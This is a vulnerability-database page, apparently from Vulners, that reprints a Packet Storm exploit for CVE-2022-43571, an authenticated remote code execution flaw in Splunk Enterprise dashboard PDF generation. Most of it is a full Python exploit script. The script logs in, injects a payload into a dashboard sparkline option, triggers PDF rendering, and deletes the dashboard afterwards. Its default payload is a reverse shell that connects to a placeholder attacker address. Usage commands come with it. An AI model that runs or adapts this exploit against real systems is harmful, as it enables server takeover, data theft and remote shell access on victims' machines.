| Reporter | Title | Published | Views | Family All 16 |
|---|---|---|---|---|
| CVE-2022-43571 | 3 Nov 202223:15 | – | attackerkb | |
| CVE-2022-43571 | 3 Jan 202320:18 | – | circl | |
| Splunk 代码注入漏洞 | 2 Nov 202200:00 | – | cnnvd | |
| CVE-2022-43571 | 3 Nov 202222:56 | – | cve | |
| CVE-2022-43571 Remote Code Execution through dashboard PDF generation component in Splunk Enterprise | 3 Nov 202222:56 | – | cvelist | |
| Exploit for Code Injection in Splunk | 27 Dec 202208:00 | – | githubexploit | |
| Authenticated RCE in Splunk (SimpleXML dashboard PDF generation) | 21 Jan 202618:56 | – | metasploit | |
| Vulnerabilities fixed in Splunk Enterprise | 3 Nov 202200:00 | – | ncsc | |
| CVE-2022-43571 | 3 Nov 202223:15 | – | nvd | |
| 📄 Splunk Enterprise 8.2.9 / 9.0.2 Remote Code Execution | 21 Jan 202600:00 | – | packetstorm |
=============================================================================================================================================
| # Title : Splunk Enterprise 8.2.9 / 9.0.2 Authenticated Remote Code Execution via PDF Dashboard Rendering |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.1 (64 bits) |
| # Vendor : https://www.splunk.com |
=============================================================================================================================================
[+] Summary : CVE‑2022‑43571 is a critical authenticated Remote Code Execution (RCE) vulnerability affecting Splunk Enterprise.
The flaw resides in the SimpleXML dashboard PDF generation process, where insufficient input sanitization allows a privileged authenticated user to inject malicious content into dashboard configurations.
When the affected dashboard is exported to PDF, the injected content may be executed in the context of the Splunk server, potentially leading to full system compromise.
Successful exploitation requires valid Splunk credentials but can result in arbitrary command execution, data exposure, and lateral movement. Splunk has released patches,
and immediate upgrading to a fixed version is strongly recommended.
[+] Usage :
pip install requests packaging
# For testing only : python poc.py -u https://splunk.example.com:8000 --username admin --password password --check-only
# To run the exploit : python poc.py -u https://splunk.example.com:8000 --username admin --password password
[+] POC :
#!/usr/bin/env python3
import requests
import random
import string
import re
import sys
import time
import urllib.parse
from typing import Optional, Dict, Tuple
import base64
import json
class SplunkExploit:
def __init__(self, target_url: str, username: str, password: str, use_inline_query: bool = False):
self.target_url = target_url.rstrip('/')
self.username = username
self.password = password
self.use_inline_query = use_inline_query
self.session = requests.Session()
self.session.verify = False
self.session.headers.update({
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36'
})
self.cookie = None
self.target_app = None
self.dash_name = None
def splunk_login(self) -> Optional[str]:
"""Authenticate to Splunk and return session cookie."""
login_url = f"{self.target_url}/en-US/account/login"
resp = self.session.get(login_url)
if resp.status_code != 200:
print(f"[-] Failed to access login page: {resp.status_code}")
return None
cval_match = re.search(r'name="cval"\s+value="([^"]+)"', resp.text)
if not cval_match:
print("[-] Could not find cval token")
return None
cval = cval_match.group(1)
login_data = {
'cval': cval,
'username': self.username,
'password': self.password,
'set_has_logged_in': 'false'
}
resp = self.session.post(
f"{self.target_url}/en-US/account/login",
data=login_data,
allow_redirects=False
)
if resp.status_code in [302, 200]:
if 'splunkweb_csrf_token' in self.session.cookies:
self.cookie = f"splunkweb_csrf_token={self.session.cookies['splunkweb_csrf_token']}"
print(f"[+] Successfully logged in as {self.username}")
return self.cookie
print("[-] Login failed")
return None
def check_splunk_version(self) -> Tuple[bool, str]:
"""Check if Splunk version is vulnerable."""
if not self.cookie:
self.cookie = self.splunk_login()
if not self.cookie:
return False, "Login failed"
version_url = f"{self.target_url}/en-US/app/launcher/home"
headers = {'Cookie': self.cookie}
resp = self.session.get(version_url, headers=headers)
if resp.status_code != 200:
return False, f"Failed to access home page: {resp.status_code}"
version_match = re.search(r'Splunk®\s+([\d\.]+)', resp.text)
if version_match:
version_str = version_match.group(1)
print(f"[+] Found Splunk version: {version_str}")
from packaging import version as pkg_version
try:
v = pkg_version.parse(version_str)
if (pkg_version.parse("8.1.0") <= v <= pkg_version.parse("8.1.11")) or \
(pkg_version.parse("8.2.0") <= v <= pkg_version.parse("8.2.8")) or \
(pkg_version.parse("9.0.0") <= v <= pkg_version.parse("9.0.1")):
return True, f"Vulnerable version found: {version_str}"
else:
return False, f"Non-vulnerable version: {version_str}"
except Exception as e:
print(f"[-] Error parsing version: {e}")
return False, "Could not parse version"
return False, "Could not determine version"
def gen_inline_splunk_query(self) -> str:
"""Generate an inline Splunk query."""
row_id_name = self.random_string(8, 16)
arr_field = self.random_string(8, 16)
rand_count = random.randint(100, 500)
step = random.randint(2, 15)
col_count = random.randint(3, 10)
column_names = [self.random_string(8, 16) for _ in range(col_count)]
delimiter = random.choice([';', '|', ':', '#', '!'])
names_string = delimiter.join(column_names)
query = f"""
| makeresults count={rand_count}
| streamstats count as {row_id_name}
| eval _time = now() - ({row_id_name} * {step}),
{arr_field} = split("{names_string}", "{delimiter}"),
sourcetype = mvindex({arr_field}, {row_id_name} % {col_count})
| chart sparkline count by sourcetype
"""
return query.strip()
def get_system_index_splunk_query(self) -> str:
"""Get a query using system indexes."""
rand_tail = random.randint(100, 200)
index = random.choice(['_internal', '_audit', '_introspection'])
return f"index={index} | tail {rand_tail} | chart sparkline count by sourcetype"
def random_string(self, min_len: int = 8, max_len: int = 16) -> str:
"""Generate random alphanumeric string."""
length = random.randint(min_len, max_len)
return ''.join(random.choices(string.ascii_letters + string.digits, k=length))
def get_random_app(self, enabled: bool = True) -> str:
"""Get a random app name (simplified)."""
common_apps = ['search', 'launcher', 'splunk_monitoring_console']
return random.choice(common_apps)
def create_dashboard(self, app: str, dash_name: str, template: str) -> bool:
"""Create a dashboard with malicious template."""
create_url = f"{self.target_url}/en-US/splunkd/__raw/servicesNS/{self.username}/{app}/data/ui/views"
headers = {
'Cookie': self.cookie,
'Content-Type': 'application/x-www-form-urlencoded',
'X-Splunk-Form-Key': self.get_form_key()
}
data = {
'name': dash_name,
'eai:data': template
}
resp = self.session.post(create_url, headers=headers, data=data)
if resp.status_code in [200, 201]:
print(f"[+] Dashboard '{dash_name}' created successfully")
return True
print(f"[-] Failed to create dashboard: {resp.status_code}")
print(f"Response: {resp.text[:500]}")
return False
def get_form_key(self) -> str:
"""Extract form key from Splunk page."""
home_url = f"{self.target_url}/en-US/app/launcher/home"
headers = {'Cookie': self.cookie}
resp = self.session.get(home_url, headers=headers)
if resp.status_code == 200:
match = re.search(r'formKey\s*:\s*"([^"]+)"', resp.text)
if match:
return match.group(1)
return self.random_string(32, 32)
def export_dashboard(self, app: str, dash_name: str) -> bool:
"""Trigger PDF export of dashboard to execute payload."""
export_url = f"{self.target_url}/en-US/api/pdfgen/render"
headers = {
'Cookie': self.cookie,
'Content-Type': 'application/json',
'X-Splunk-Form-Key': self.get_form_key()
}
payload = {
'serverURL': f"{self.target_url}/en-US",
'app': app,
'dashboard': dash_name,
'width': 1000,
'height': 800
}
try:
resp = self.session.post(
export_url,
headers=headers,
json=payload,
timeout=30
)
print("[+] PDF export triggered (payload execution attempted)")
return True
except Exception as e:
print(f"[*] Export request completed (expected if payload executes): {e}")
return True
def delete_dashboard(self, app: str, dash_name: str) -> bool:
"""Delete the created dashboard."""
delete_url = f"{self.target_url}/en-US/splunkd/__raw/servicesNS/{self.username}/{app}/data/ui/views/{dash_name}"
headers = {
'Cookie': self.cookie,
'X-Splunk-Form-Key': self.get_form_key()
}
resp = self.session.delete(delete_url, headers=headers)
if resp.status_code in [200, 204]:
print(f"[+] Dashboard '{dash_name}' deleted")
return True
return False
def generate_malicious_template(self, payload: str) -> str:
"""Generate malicious dashboard template with payload."""
if self.use_inline_query:
splunk_query = self.gen_inline_splunk_query()
else:
splunk_query = self.get_system_index_splunk_query()
style_param = random.choice(['lineColor', 'fillColor'])
escaped_payload = urllib.parse.quote(payload)
template = f"""<dashboard>
<row>
<panel>
<table>
<search>
<query>
{splunk_query}
</query>
</search>
<format field="sparkline" type="sparkline">
<option name="{style_param}">{escaped_payload}</option>
</format>
</table>
</panel>
</row>
</dashboard>"""
lines = template.split('\n')
return '\n'.join(line.strip() for line in lines if line.strip())
def exploit(self, reverse_shell_payload: str = None) -> bool:
"""Execute the full exploit chain."""
print("[*] Starting Splunk RCE exploit (CVE-2022-43571)")
print("[*] Attempting to login...")
if not self.splunk_login():
return False
print("[*] Checking Splunk version...")
is_vuln, msg = self.check_splunk_version()
print(f"[*] {msg}")
if not is_vuln:
print("[-] Target does not appear to be vulnerable")
return False
if not reverse_shell_payload:
# Example Python reverse shell payload
reverse_shell_payload = """__import__('os').system('python3 -c "import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\\\"YOUR_IP\\\",YOUR_PORT));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call([\\\"/bin/sh\\\",\\\"-i\\\"])"')"""
print(f"[*] Using payload: {reverse_shell_payload[:50]}...")
print("[*] Generating malicious dashboard template...")
template = self.generate_malicious_template(reverse_shell_payload)
self.target_app = self.get_random_app()
self.dash_name = self.random_string(8, 16)
print(f"[*] Target app: {self.target_app}")
print(f"[*] Dashboard name: {self.dash_name}")
print("[*] Creating dashboard...")
if not self.create_dashboard(self.target_app, self.dash_name, template):
return False
print("[*] Triggering PDF export to execute payload...")
if not self.export_dashboard(self.target_app, self.dash_name):
print("[-] Failed to trigger export")
time.sleep(5)
print("[*] Attempting to cleanup...")
self.delete_dashboard(self.target_app, self.dash_name)
print("[+] Exploit completed")
return True
def cleanup(self):
"""Cleanup created resources."""
if self.target_app and self.dash_name:
self.delete_dashboard(self.target_app, self.dash_name)
def main():
"""Main function for standalone execution."""
import argparse
parser = argparse.ArgumentParser(description='Splunk RCE Exploit (CVE-2022-43571)')
parser.add_argument('-u', '--url', required=True, help='Splunk base URL (e.g., https://splunk.example.com:8000)')
parser.add_argument('--username', default='admin', help='Splunk username (default: admin)')
parser.add_argument('--password', required=True, help='Splunk password')
parser.add_argument('--inline-query', action='store_true', help='Use inline Splunk query')
parser.add_argument('--check-only', action='store_true', help='Only check if target is vulnerable')
args = parser.parse_args()
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
exploit = SplunkExploit(
target_url=args.url,
username=args.username,
password=args.password,
use_inline_query=args.inline_query
)
try:
if args.check_only:
is_vuln, msg = exploit.check_splunk_version()
print(f"\n{'='*50}")
print(f"Check Results: {msg}")
print(f"{'='*50}")
sys.exit(0 if is_vuln else 1)
else:
success = exploit.exploit()
sys.exit(0 if success else 1)
except KeyboardInterrupt:
print("\n[*] Exploit interrupted by user")
exploit.cleanup()
sys.exit(1)
except Exception as e:
print(f"\n[-] Error: {e}")
exploit.cleanup()
sys.exit(1)
if __name__ == "__main__":
main()
Greetings to :============================================================
jericho * Larry W. Cashdollar * r00t * Malvuln (John Page aka hyp3rlinx)*|
==========================================================================Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation